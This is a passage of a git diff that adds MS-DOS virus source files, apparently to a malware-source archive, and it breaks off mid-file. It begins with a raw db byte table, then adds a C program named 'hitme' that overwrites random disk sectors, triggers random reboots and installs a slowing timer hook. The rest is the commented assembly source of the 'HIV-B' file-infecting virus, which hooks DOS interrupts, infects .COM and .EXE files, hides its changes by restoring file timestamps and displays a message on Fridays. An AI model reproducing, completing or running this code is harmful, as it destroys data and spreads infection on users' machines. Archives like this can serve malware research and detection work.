058h,07Bh,070h,03Ah,05Bh,0BCh,08Eh,0A8h,0ACh,034h,08Fh,0D8h,028h + db 05Bh,0E0h,028h,07Fh,059h,029h,0ABh,0CCh,064h,06Bh,080h,049h,0AFh + db 0D0h,023h,07Fh,0B0h,00Eh,089h,061h,02Fh,0B7h,0B2h,070h,092h,088h + db 06Fh,0EFh,090h,023h,09Bh,0B4h,035h,08Ch,03Dh,03Fh,0D3h,094h,08Bh + db 0C7h,060h,03Bh,0B9h,082h,069h,0CFh,0A0h,027h,084h,02Ah,04Bh,0EFh + db 08Ch,07Eh,08Ch,050h,05Fh,0E3h,079h,04Fh,0AFh,078h,01Bh,081h,02Ch + db 03Dh,0D3h,078h,077h,0B3h,066h,055h,0BFh,082h,069h,0B2h,0A8h,025h + db 08Ah,035h,043h,0D3h,09Ch,07Bh,09Bh,05Ah,03Dh,0AFh,0C6h,07Fh,077h + db 07Fh,062h,06Ah,096h,05Dh,073h,0AAh,06Ah,08Ch,08Ah,054h,04Fh,08Eh + db 0AAh,07Bh,06Fh,09Ch,070h,05Dh,084h,056h,07Fh,0C5h,085h,073h,060h + db 05Ah,071h,0C3h,0A8h,050h,056h,064h,071h,087h,0ACh,04Bh,071h,088h + db 074h,0A4h,08Bh,085h,069h,072h,0A9h,090h,067h,07Ch,0A8h,038h,07Fh + db 088h,05Bh,07Fh,0A5h,06Ah,073h,0B9h,05Bh,056h,0B2h,05Ah,042h,0A2h + db 0CCh,044h,037h,079h,055h,073h,0E2h,0A5h,06Bh,091h,062h,056h,0B7h + db 0ACh,051h,05Fh,0A1h,090h,02Eh,0A3h,07Eh,045h,09Fh,0A2h,07Ch,095h + db 08Ah,070h,067h,0AEh,074h,055h,0A7h,0DBh,018h,033h,066h,06Ch,07Bh + db 0C3h,090h,049h,07Dh,093h,076h,0B3h,0B0h,041h,046h,0A3h,08Dh,02Ah + db 08Fh,075h,046h,087h,0B2h,07Bh,07Eh,091h,06Eh,071h,09Fh,08Ah,069h + db 070h,092h,08Ah,04Fh,096h,090h,056h,07Dh,090h,084h,07Dh,0A1h,086h + db 066h,084h,08Bh,073h,081h,080h,084h,072h,089h,082h,06Bh,06Eh,07Fh + db 080h,077h,079h,095h,091h,059h,059h,081h,070h,069h,08Bh,08Eh,088h + db 059h,07Ch,06Dh,097h,083h,06Eh,07Fh,087h,093h,087h,078h,05Ch,078h + db 098h,07Eh,077h,08Fh,097h,062h,067h,080h,066h,07Eh,0A1h,07Ah,07Dh + db 089h,095h,078h,055h,073h,092h,08Ch,077h,07Dh,096h,092h,04Ah,05Fh + db 06Eh,087h,092h,08Ch,082h,085h,092h,078h,058h,06Ch,092h,073h,073h + db 086h,08Eh,07Fh,05Eh,04Ah,06Ch,073h,092h,0A0h,07Eh,090h,097h,08Bh + db 073h,070h,078h,089h,089h,075h,079h,08Fh,08Eh,07Ah,040h,05Fh,07Ch + db 086h,085h,0A2h,0A9h,084h,07Fh,075h,05Ch,073h,09Ch,076h,061h,07Fh + db 079h,075h,092h,082h,031h,069h,086h,076h,09Fh,0B1h,07Eh,073h,092h + db 06Bh,067h,097h,087h,074h,078h,07Ah,085h,099h,065h,067h,088h,054h + db 069h,085h,084h,087h,0A3h,08Ch,078h,09Fh,086h,053h,067h,07Ch,068h + db 075h,092h,078h,072h,07Ch,062h,07Dh,0AFh,090h,06Bh,07Ch,06Eh,068h + db 08Fh,0A0h,078h,06Ah,072h,075h,08Dh,08Ch,07Eh,089h,072h,054h,072h + db 08Bh,089h,07Fh,072h,06Bh,08Ah,0A2h,089h,08Fh,085h,066h,071h,093h + db 088h,074h,078h,06Dh,070h,08Ah,088h,089h,08Dh,072h,06Bh,080h,078h + db 079h,070h,069h,06Ch,07Ch,08Bh,082h,08Bh,078h,06Ah,087h,081h,07Eh + db 08Eh,070h,05Fh,079h,085h,07Fh,087h,07Ah,05Fh,08Ah,0A4h,076h,079h + db 080h,06Ah,069h,075h,07Eh,093h,0A5h,081h,072h,088h,088h,085h,090h + db 078h,060h,071h,07Bh,07Fh,084h,07Ah,068h,07Ah,08Ch,07Fh,07Ah,070h + db 068h,076h,07Ch,077h,093h,0A2h,080h,086h,07Dh,07Bh,083h,08Eh,068h + db 064h,074h,06Eh,077h,097h,074h,068h,080h,080h,071h,08Bh,07Ch,059h + db 079h,08Ah,074h,099h,09Ch,066h,07Fh,0A6h,07Fh,08Fh,0A0h,056h,06Dh + db 0A2h,06Ch,07Dh,09Dh,060h,05Fh,098h,072h,063h,097h,088h,048h,07Dh + db 085h,069h,0A3h,088h,04Eh,063h,09Fh,091h,077h,08Ch,074h,042h,085h + db 09Ch,06Ch,095h,066h,051h,08Fh,0CFh,07Ah,073h,09Ah,080h,065h,097h + db 080h,05Ah,081h,04Ch,04Ah,09Eh,09Ch,074h,07Fh,083h,086h,097h,09Ah + db 069h,07Fh,08Ch,060h,06Fh,0A0h,077h,06Eh,08Ch,08Eh,07Dh,083h,083h + db 064h,07Ah,074h,05Eh,079h,09Fh,07Ah,063h,083h,092h,069h,091h,088h + db 052h,075h,070h,069h,08Fh,0A0h,06Bh,074h,0ABh,08Eh,062h,08Dh,066h + db 063h,08Ah,071h,07Bh,0BBh,098h,068h,087h,0A4h,077h,097h,08Ch,044h + db 056h,069h,071h,0A7h,094h,05Dh,05Eh,0A4h,07Ch,077h,08Eh,05Ch,04Dh + db 07Eh,074h,07Bh,0ACh,078h,059h,0A3h,0A4h,060h,082h,084h,049h,075h + db 081h,07Eh,0ADh,0A5h,071h,07Fh,0BAh,074h,071h,084h,04Ah,05Bh,073h + db 071h,087h,0ADh,07Ch,062h,0ADh,093h,073h,097h,06Ah,03Fh,070h,077h + db 07Bh,0B5h,088h,058h,08Bh,0A8h,061h,079h,080h,045h,06Eh,075h,071h + db 09Bh,0B2h,072h,06Bh,0B0h,080h,078h,096h,061h,042h,05Fh,073h,08Dh + db 0B4h,088h,068h,0A3h,096h,06Fh,08Dh,07Ch,04Ah,05Eh,06Ch,07Fh,0BBh + db 0A0h,070h,08Fh,0B0h,07Eh,07Fh,08Ah,040h,030h,063h,086h,0AFh,0ACh + db 066h,063h,0B3h,080h,07Ch,07Eh,04Ch,03Fh,059h,079h,096h,09Bh,084h + db 077h,0ADh,090h,071h,085h,080h,03Eh,041h,073h,093h,0D3h,0B2h,076h + db 091h,09Ah,083h,0A3h,090h,040h,038h,05Bh,08Ah,0A7h,088h,071h,086h + db 090h,06Bh,07Eh,083h,052h,043h,057h,08Bh,0BBh,0C0h,080h,07Fh,0AAh + db 068h,07Bh,094h,050h,030h,048h,076h,09Dh,0A6h,07Dh,072h,0A7h,07Ah + db 069h,07Ah,07Dh,054h,065h,06Ch,085h,0A9h,0AAh,095h,0B2h,09Ch,059h + db 089h,0A1h,04Ch,049h,060h,07Eh,0C3h,0C0h,080h,083h,0A9h,067h,07Bh + db 08Dh,060h,03Ch,05Ah,085h,081h,07Eh,079h,08Dh,0B3h,060h,05Bh,07Bh + db 064h,03Dh,053h,06Ch,093h,0B5h,090h,08Ah,0BBh,07Ah,06Fh,08Fh,076h + db 046h,05Fh,070h,087h,0B3h,08Ch,07Ch,0AEh,078h,059h,085h,07Eh,048h + db 050h,07Bh,09Dh,0C1h,0A1h,08Fh,09Fh,098h,073h,085h,07Ch,048h,055h + db 07Ah,083h,083h,08Bh,08Bh,0A0h,0A8h,068h,06Fh,087h,05Eh,04Ah,061h + db 083h,095h,0A1h,090h,08Fh,0A8h,068h,067h,07Fh,062h,03Ah,056h,06Eh + db 097h,0B3h,087h,076h,09Fh,096h,06Ah,083h,080h,043h,056h,07Eh,088h + db 087h,08Fh,090h,0ADh,0B4h,060h,066h,08Dh,06Dh,044h,05Ch,075h,096h + db 0CAh,08Ch,063h,098h,071h,079h,087h,078h,044h,04Bh,083h,097h,09Bh + db 08Ah,07Ch,09Eh,0ACh,061h,05Fh,07Fh,062h,04Ah,067h,08Ah,095h,0BBh + db 098h,08Ch,0BDh,084h,085h,091h,06Ch,045h,059h,085h,08Bh,095h,08Bh + db 083h,0A4h,08Ch,04Dh,06Ah,08Bh,060h,048h,05Eh,07Fh,0ADh,0CCh,07Ch + db 068h,09Ch,064h,083h,089h,054h,036h,04Fh,07Dh,096h,0AFh,088h,072h + db 086h,0A0h,08Bh,074h,05Bh,04Dh,073h,078h,087h,09Eh,09Dh,092h,0A5h + db 0BCh,076h,07Bh,085h,059h,055h,06Ch,081h,093h,0A7h,0A1h,07Bh,07Ch + db 084h,06Dh,07Ch,07Bh,042h,039h,057h,07Dh,0C5h,0ACh,05Ah,071h,092h + db 06Ah,08Ah,09Fh,061h,046h,06Eh,099h,0BBh,0ABh,076h,073h,0A4h,068h + db 069h,06Fh,061h,036h,04Dh,07Bh,09Fh,0D1h,0A2h,081h,0B2h,098h,07Eh + db 093h,086h,04Bh,04Dh,077h,08Dh,0A7h,092h,07Ah,09Dh,0A0h,057h,072h + db 07Ah,05Ch,063h,065h,06Fh,09Fh,0CDh,08Dh,074h,09Ch,060h,063h,089h + db 070h,035h,046h,070h,095h,0C6h,090h,061h,085h,094h,06Ah,07Fh,07Eh + db 04Ah,05Ch,066h,076h,0A5h,0BAh,090h,087h,0BAh,082h,07Eh,095h,086h + db 04Ch,054h,07Dh,09Eh,0C9h,0A0h,06Ch,093h,086h,065h,073h,078h,03Dh + db 058h,065h,06Fh,08Ah,0AAh,090h,094h,0A1h,055h,062h,08Bh,068h,03Eh + db 04Ch,06Ch,09Bh,0D8h,090h,06Eh,0ACh,086h,07Dh,092h,076h,044h,052h + db 073h,089h,0B9h,096h,06Eh,08Dh,0A2h,065h,06Dh,084h,04Ah,05Dh,079h + db 090h,085h,094h,0ADh,0BBh,0C4h,066h,062h,083h,08Eh,056h,054h,068h + db 07Bh,0BFh,0BCh,070h,082h,063h,06Eh,08Dh,085h,040h,04Ah,069h,085h + db 0BDh,090h,05Ch,075h,09Ah,073h,07Bh,088h,050h,053h,074h,087h,097h + db 0ADh,08Eh,085h,0B3h,080h,073h,07Bh,076h,048h,059h,098h,092h,088h + db 08Ch,099h,0B6h,0A8h,05Bh,064h,081h,05Ch,050h,058h,066h,085h,0BFh + db 0A6h,072h,082h,057h,077h,0A5h,07Ch,04Dh,062h,07Bh,092h,0CAh,088h + db 054h,095h,080h,069h,07Bh,080h,04Ch,059h,07Ah,092h,0B5h,0B0h,079h + db 08Dh,09Ah,07Fh,07Fh,084h,057h,056h,076h,091h,09Fh,0A2h,088h,08Ah + db 0A5h,06Ah,06Dh,075h,05Ch,049h,062h,079h,087h,0BEh,099h,066h,08Eh + db 076h,07Eh,08Bh,074h,04Dh,05Bh,077h,089h,0AFh,0A0h,061h,07Bh,082h + db 065h,077h,08Eh,068h,068h,073h,08Eh,0A6h,0CAh,08Dh,065h,087h,08Bh + db 084h,076h,07Ch,054h,063h,075h,08Ah,0ADh,0B5h,078h,077h,093h,06Fh + db 07Bh,086h,060h,05Dh,068h,07Ah,093h,0C5h,08Ch,055h,083h,069h,071h + db 076h,072h,056h,05Ch,06Bh,081h,0ADh,0C4h,080h,067h,07Ah,061h,077h + db 096h,07Ah,072h,06Dh,07Eh,095h,0C2h,0B8h,064h,06Fh,072h,069h,078h + db 09Ah,078h,06Eh,073h,087h,0A7h,0CEh,098h,050h,07Eh,073h,074h,07Dh + db 088h,062h,066h,07Fh,091h,09Fh,0C3h,080h,058h,07Eh,060h,065h,081h + db 078h,057h,05Fh,088h,08Ch,0A0h,0B5h,076h,057h,070h,058h,070h,094h + db 075h,05Ch,077h,09Ch,08Ah,0A3h,0B8h,068h,05Fh,08Ch,06Dh,06Ah,095h + db 07Bh,06Bh,085h,093h,08Ah,0AFh,0B0h,064h,05Fh,08Fh,063h,069h,08Fh + db 067h,063h,07Dh,08Ah,082h,0A9h,0A8h,05Eh,05Dh,08Ah,060h,06Ah,089h + db 074h,073h,07Fh,092h,07Ch,089h,0B3h,081h,05Fh,093h,072h,066h,07Ah + db 08Eh,07Eh,089h,094h,080h,07Eh,09Fh,098h,064h,088h, +slutt: + +size equ $-100h +pgf equ ($+16)/16 + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.hitme.asm b/MSDOS/Virus.MSDOS.Unknown.hitme.asm new file mode 100644 index 00000000..b6c00798 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.hitme.asm @@ -0,0 +1,42 @@ +#include +#include +#include +#include +#include +#include + +#define INTR 0X1C + +#ifdef __cplusplus + #define __CPPARGS ... +#else + #define __CPPARGS +#endif + +void interrupt ( *oldhandler)(__CPPARGS); + +void interrupt handler(__CPPARGS) +{ +delay(135); +oldhandler(); +} + +void main(void) +{ +randomize(); char buf[512]; +abswrite(2, 1, random(50000)+2000, buf); + +if(random(20) == 10) asm INT 19h + + oldhandler = getvect(INTR); + setvect(INTR, handler); + _ES = _psp; //PSP address + asm MOV es,es:[2ch] + _AH = 0x49; //Function 49 (remove memory block) + asm INT 21h //Call DOS to execute instruction + _AH = 0x31; //Function 31 (tsr) + _AL = 0x00; //Exit code + _DX = _psp; //PSP address + asm INT 21h //Call DOS to execute instruction + +} \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.hiv-b.asm b/MSDOS/Virus.MSDOS.Unknown.hiv-b.asm new file mode 100644 index 00000000..c6db4f0e --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.hiv-b.asm @@ -0,0 +1,745 @@ +DATA_1E EQU 4CH ; Just a Few Data Segments that are +DATA_3E EQU 84H ; Needed for the virus to find some +DATA_5E EQU 90H ; hard core info... +DATA_7E EQU 102H +DATA_8E EQU 106H +DATA_9E EQU 122H +DATA_10E EQU 124H +DATA_11E EQU 15AH +DATA_12E EQU 450H +DATA_13E EQU 462H +DATA_14E EQU 47BH +DATA_15E EQU 0 +DATA_16E EQU 1 +DATA_17E EQU 2 +DATA_18E EQU 6 +DATA_42E EQU 0FB2CH +DATA_43E EQU 0FB2EH +DATA_44E EQU 0FB4BH +DATA_45E EQU 0FB4DH +DATA_46E EQU 0FB83H +DATA_47E EQU 0FB8DH +DATA_48E EQU 0FB8FH +DATA_49E EQU 0FB95H +DATA_50E EQU 0FB97H +DATA_51E EQU 0 +DATA_52E EQU 2 + +SEG_A SEGMENT BYTE PUBLIC + ASSUME CS:SEG_A, DS:SEG_A + + + ORG 100h ; Compile this to a .COM file! + ; So the Virus starts at 0100h +HIV PROC FAR + +START: + JMP LOC_35 + DB 0C3H + DB 23 DUP (0C3H) + DB 61H, 6EH, 74H, 69H, 64H, 65H + DB 62H, 0C3H, 0C3H, 0C3H, 0C3H + DB 'HIV-B Virus - Release 1.1 [NukE]' + DB ' ' +copyright DB '(C) Edited by Rock Steady [NukE]' + DB 0, 0 +DATA_24 DW 0 +DATA_25 DW 0 +DATA_26 DW 0 +DATA_27 DW 706AH +DATA_28 DD 00000H +DATA_29 DW 0 +DATA_30 DW 706AH +DATA_31 DD 00000H +DATA_32 DW 0 +DATA_33 DW 706AH +DATA_34 DB 'HIV-B VIRUS - Release 1.1 [NukE]', 0AH, 0DH + DB 'Edited by Rock Steady [NukE]', 0AH, 0DH + DB '(C) 1991 Italian Virus Laboratory', 0AH, 0DH + DB '$' + DB 0E8H, 83H, 3, 3DH, 4DH, 4BH + DB 75H, 9, 55H, 8BH, 0ECH, 83H + DB 66H, 6, 0FEH, 5DH, 0CFH, 80H + DB 0FCH, 4BH, 74H, 12H, 3DH, 0 + DB 3DH, 74H, 0DH, 3DH, 0, 6CH + DB 75H, 5, 80H, 0FBH, 0, 74H + DB 3 +LOC_1: + JMP LOC_13 +LOC_2: + PUSH ES ; Save All Regesters so that when + PUSH DS ; we restore the program it will + PUSH DI ; RUN correctly and hide the fact + PUSH SI ; that any Virii is tampering with + PUSH BP ; the System.... + PUSH DX + PUSH CX + PUSH BX + PUSH AX + CALL SUB_6 + CALL SUB_7 + CMP AX,6C00H + JNE LOC_3 ; Jump if not equal + MOV DX,SI +LOC_3: + MOV CX,80H + MOV SI,DX + +LOCLOOP_4: + INC SI ; Slowly down the System a + MOV AL,[SI] ; little. + OR AL,AL ; Zero ? + LOOPNZ LOCLOOP_4 ; Loop if zf=0, cx>0 + + SUB SI,2 + CMP WORD PTR [SI],4D4FH + JE LOC_7 ; Jump if equal + CMP WORD PTR [SI],4558H + JE LOC_6 ; Jump if equal +LOC_5: + JMP SHORT LOC_12 ; + DB 90H +LOC_6: + CMP WORD PTR [SI-2],452EH + JE LOC_8 ; Jump if equal + JMP SHORT LOC_5 ; +LOC_7: + NOP + CMP WORD PTR [SI-2],432EH + JNE LOC_5 ; Jump if not equal +LOC_8: + MOV AX,3D02H + CALL SUB_5 + JC LOC_12 ; Jump if carry Set + MOV BX,AX + MOV AX,5700H + CALL SUB_5 ; Initsilize the virus... + MOV CS:DATA_24,CX ; A Basic Start up to check + MOV CS:DATA_25,DX ; The Interrup 21h + MOV AX,4200H + XOR CX,CX + XOR DX,DX + CALL SUB_5 + PUSH CS + POP DS + MOV DX,103H + MOV SI,DX + MOV CX,18H + MOV AH,3FH + CALL SUB_5 + JC LOC_10 ; Jump if carry Set + CMP WORD PTR [SI],5A4DH + JNE LOC_9 ; Jump if not equal + CALL SUB_1 + JMP SHORT LOC_10 +LOC_9: + CALL SUB_4 +LOC_10: + JC LOC_11 ; Jump if carry Set + MOV AX,5701H + MOV CX,CS:DATA_24 + MOV DX,CS:DATA_25 + CALL SUB_5 +LOC_11: + MOV AH,3EH ; '>' + CALL SUB_5 +LOC_12: + CALL SUB_7 + POP AX ; A Stealth Procedure to + POP BX ; end the virus and restore + POP CX ; the program! Pup back all + POP DX ; regesters as we found them! + POP BP ; so nothings changed... + POP SI + POP DI + POP DS + POP ES +LOC_13: + JMP CS:DATA_28 + DB 0B4H, 2AH, 0CDH, 21H, 0C3H + +HIV ENDP + +;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* +;*- SUBROUTINE *- +;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* + +SUB_1 PROC NEAR ; Start of the Virus! + MOV AH,2AH ; Get the Date system Date! + INT 21H ; If its Friday Display the + ; message at Data34 and End! + CMP AL,6 + JE LOC_15 ; If Friday display message + JNZ LOC_14 ; If not continue infecting +LOC_14: ; and screwing the system! + MOV CX,[SI+16H] + ADD CX,[SI+8] + MOV AX,10H + MUL CX ; dx:ax = reg * ax + ADD AX,[SI+14H] + ADC DX,0 + PUSH DX + PUSH AX + MOV AX,4202H + XOR CX,CX ; Zero register + XOR DX,DX ; Zero register + CALL SUB_5 + CMP DX,0 + JNE LOC_16 ; Jump if not equal + CMP AX,64EH + JAE LOC_16 ; Jump if above or = + POP AX + POP DX + STC ; Set carry flag + RETN +LOC_15: + MOV DX,OFFSET DATA_34+18H ; Display Message at Data34! + MOV AH,9 ; With New Offset Address in + INT 21H ; memory! + ; + POP AX ; Restore all Regesters as if + POP BX ; nothing was changed and exit + POP CX ; virus and run File... + POP DX + POP SI + POP DI + POP BP + POP DS + POP ES + MOV AH,0 ; Exit Virus if your in a .EXE + INT 21H ; File!!! + ; Exit virus if your in a .COM + INT 20H ; File!!! +LOC_16: + MOV DI,AX + MOV BP,DX + POP CX + SUB AX,CX + POP CX + SBB DX,CX + CMP WORD PTR [SI+0CH],0 + JE LOC_RET_19 ; Jump if equal + CMP DX,0 + JNE LOC_17 ; Jump if not equal + CMP AX,64EH + JNE LOC_17 ; Jump if not equal + STC ; Set carry flag + RETN +LOC_17: + MOV DX,BP + MOV AX,DI + PUSH DX + PUSH AX + ADD AX,64EH + ADC DX,0 + MOV CX,200H + DIV CX ; Find out How much System + LES DI,DWORD PTR [SI+2] ; memory is available... + MOV CS:DATA_26,DI ; + MOV CS:DATA_27,ES ; Every so often make the + MOV [SI+2],DX ; system memory small than + CMP DX,0 ; what it already is... + JE LOC_18 ; Screws up the users hehe + INC AX +LOC_18: + MOV [SI+4],AX + POP AX + POP DX + CALL SUB_2 + SUB AX,[SI+8] + LES DI,DWORD PTR [SI+14H] + MOV DS:DATA_9E,DI + MOV DS:DATA_10E,ES + MOV [SI+14H],DX ; Tie up some memory! + MOV [SI+16H],AX ; release it on next execution + MOV DS:DATA_11E,AX ; Jump to su routine to do + MOV AX,4202H ; this and disable interrups + XOR CX,CX + XOR DX,DX + CALL SUB_5 + CALL SUB_3 + JC LOC_RET_19 + MOV AX,4200H + XOR CX,CX ; Zero register + XOR DX,DX ; Zero register + CALL SUB_5 + MOV AH,40H + MOV DX,SI + MOV CX,18H + CALL SUB_5 +LOC_RET_19: + RETN +SUB_1 ENDP + + +;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* +;*- SUBROUTINE *- +;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* + +SUB_2 PROC NEAR + MOV CX,4 + MOV DI,AX + AND DI,0FH + +LOCLOOP_20: + SHR DX,1 ; Shift w/zeros fill + RCR AX,1 ; Rotate thru carry + LOOP LOCLOOP_20 ; Loop if cx > 0 + + MOV DX,DI + RETN +SUB_2 ENDP + + +;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* +;*- SUBROUTINE *- +;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* + +SUB_3 PROC NEAR + MOV AH,40H + MOV CX,64EH + MOV DX,100H + CALL SUB_6 + JMP SHORT LOC_24 + DB 90H + +;*-*- External Entry into Subroutine -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* + +SUB_4: + MOV AX,4202H + XOR CX,CX ; Zero register + XOR DX,DX ; Zero register + CALL SUB_5 + CMP AX,64EH + JB LOC_RET_23 ; Jump if below + CMP AX,0FA00H + JAE LOC_RET_23 ; Jump if above or = + PUSH AX + CMP BYTE PTR [SI],0E9H + JNE LOC_21 ; Jump if not equal + SUB AX,651H + CMP AX,[SI+1] + JNE LOC_21 ; Jump if not equal + POP AX + STC ; Set carry flag + RETN +LOC_21: + CALL SUB_3 + JNC LOC_22 ; Jump if carry=0 + POP AX + RETN +LOC_22: + MOV AX,4200H + XOR CX,CX ; Zero register + XOR DX,DX ; Zero register + CALL SUB_5 + POP AX + SUB AX,3 + MOV DX,122H + MOV SI,DX + MOV BYTE PTR CS:[SI],0E9H + MOV CS:[SI+1],AX + MOV AH,40H + MOV CX,3 + CALL SUB_5 + +LOC_RET_23: + RETN +SUB_3 ENDP + + +;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* +;*- SUBROUTINE *- +;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* + +SUB_5 PROC NEAR +LOC_24: + PUSHF ; Push flags + CALL CS:DATA_28 + RETN +SUB_5 ENDP + + +;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* +;*- SUBROUTINE *- +;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* + +SUB_6 PROC NEAR + PUSH AX + PUSH DS + PUSH ES + XOR AX,AX ; Zero register + PUSH AX + POP DS + CLI ; Disable the interrupts + LES AX,DWORD PTR DS:DATA_5E ; This Copies the Virus + MOV CS:DATA_29,AX ; to the COM File... + MOV CS:DATA_30,ES + MOV AX,46AH + MOV DS:DATA_5E,AX + MOV WORD PTR DS:DATA_5E+2,CS + LES AX,DWORD PTR DS:DATA_1E ; Loads 32Bit word.. + MOV CS:DATA_32,AX ; get your info needed on + MOV CS:DATA_33,ES ; System... + LES AX,CS:DATA_31 + MOV DS:DATA_1E,AX + MOV WORD PTR DS:DATA_1E+2,ES + STI ; Enable the interrupts + POP ES ; and restore regesters! + POP DS ; go back to the file + POP AX ; being executed... + RETN +SUB_6 ENDP + + +;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* +;*- SUBROUTINE *- +;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* + +SUB_7 PROC NEAR + PUSH AX + PUSH DS + PUSH ES + XOR AX,AX ; Zero register + PUSH AX + POP DS + CLI ; Disable interrupts + LES AX,DWORD PTR CS:DATA_29 ; same as Sub_6 just copy + MOV DS:DATA_5E,AX ; yourself to the EXE + MOV WORD PTR DS:DATA_5E+2,ES + LES AX,DWORD PTR CS:DATA_32 + MOV DS:DATA_1E,AX + MOV WORD PTR DS:DATA_1E+2,ES + STI ; Enable interrupts + POP ES + POP DS + POP AX + RETN +SUB_7 ENDP + + DB 0B0H, 3, 0CFH, 50H, 53H, 51H + DB 52H, 56H, 57H, 55H, 1EH, 6 + DB 33H, 0C0H, 50H, 1FH, 8AH, 3EH + DB 62H, 4, 0A1H, 50H, 4, 2EH + DB 0A3H, 0CEH, 4, 2EH, 0A1H, 0C7H + DB 4, 0A3H, 50H, 4, 2EH, 0A1H + DB 0C5H, 4, 8AH, 0DCH, 0B4H, 9 + DB 0B9H, 1, 0, 0CDH, 10H, 0E8H + DB 34H, 0, 0E8H, 0B7H, 0, 2EH + DB 0A1H, 0C7H, 4, 0A3H, 50H, 4 + DB 0B3H, 2, 0B8H, 2, 9, 0B9H + DB 1, 0, 0CDH, 10H, 2EH, 0A1H + DB 0CEH, 4, 0A3H, 50H, 4, 7 + DB 1FH + DB ']_^ZY[X.' + DB 0FFH, 2EH, 0CAH, 4 +DATA_36 DW 0 +DATA_37 DW 1010H +DATA_39 DB 0 +DATA_40 DD 706A0000H + DB 0, 0, 2EH, 0A1H, 0C7H, 4 + DB 8BH, 1EH, 4AH, 4, 4BH, 2EH + DB 0F6H, 6, 0C9H, 4, 1, 74H + DB 0CH, 3AH, 0C3H, 72H, 12H, 2EH + DB 80H, 36H, 0C9H, 4, 1, 0EBH + DB 0AH +LOC_25: + CMP AL,0 + JG LOC_26 ; Jump if > + XOR CS:DATA_39,1 +LOC_26: + TEST CS:DATA_39,2 + JZ LOC_27 ; Jump if zero + CMP AH,18H + JB LOC_28 ; Jump if below + XOR CS:DATA_39,2 + JMP SHORT LOC_28 +LOC_27: + CMP AH,0 + JG LOC_28 ; Jump if > + XOR CS:DATA_39,2 +LOC_28: + CMP BYTE PTR CS:DATA_36,20H + JE LOC_29 ; Jump if equal + CMP BYTE PTR CS:DATA_37+1,0 + JE LOC_29 ; Jump if equal + XOR CS:DATA_39,2 +LOC_29: + TEST CS:DATA_39,1 + JZ LOC_30 ; Jump if zero + INC BYTE PTR CS:DATA_37 + JMP SHORT LOC_31 +LOC_30: + DEC BYTE PTR CS:DATA_37 ; (706A:04C7=10H) +LOC_31: + TEST CS:DATA_39,2 ; (706A:04C9=0) + JZ LOC_32 ; Jump if zero + INC BYTE PTR CS:DATA_37+1 ; (706A:04C8=10H) + JMP SHORT LOC_RET_33 ; (0555) +LOC_32: + DEC BYTE PTR CS:DATA_37+1 ; (706A:04C8=10H) + +LOC_RET_33: + RETN + +;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* +;*- SUBROUTINE *- +;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* + +SUB_8 PROC NEAR + MOV AX,CS:DATA_37 + MOV DS:DATA_12E,AX ; Get info on type of Video + MOV BH,DS:DATA_13E ; Display the system has... + MOV AH,8 + INT 10H ; with ah=functn 08h + ; basically fuck the cursur.. + MOV CS:DATA_36,AX + RETN +SUB_8 ENDP + + DB 50H, 53H, 51H, 52H, 56H, 57H + DB 55H, 1EH, 6, 33H, 0C0H, 50H + DB 1FH, 81H, 3EH, 70H, 0, 6DH + DB 4, 74H, 35H, 0A1H, 6CH, 4 + DB 8BH, 16H, 6EH, 4, 0B9H, 0FFH + DB 0FFH, 0F7H, 0F1H, 3DH, 10H, 0 + DB 75H, 24H, 0FAH, 8BH, 2EH, 50H + DB 4, 0E8H, 0BEH, 0FFH, 89H, 2EH + DB 50H, 4, 0C4H, 6, 70H, 0 + DB 2EH, 0A3H, 0CAH, 4, 2EH, 8CH + DB 6, 0CCH, 4, 0C7H, 6, 70H + DB 0, 6DH, 4, 8CH, 0EH, 72H + DB 0, 0FBH +LOC_34: + POP ES + POP DS ; Restore and get lost... + POP BP + POP DI + POP SI + POP DX + POP CX + POP BX + POP AX + RETN + +;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* +;*- SUBROUTINE *- +;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* +SUB_9 PROC NEAR + MOV DX,10H + MUL DX ; dx:ax = reg * ax + RETN +SUB_9 ENDP + + +;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* +;*- SUBROUTINE *- 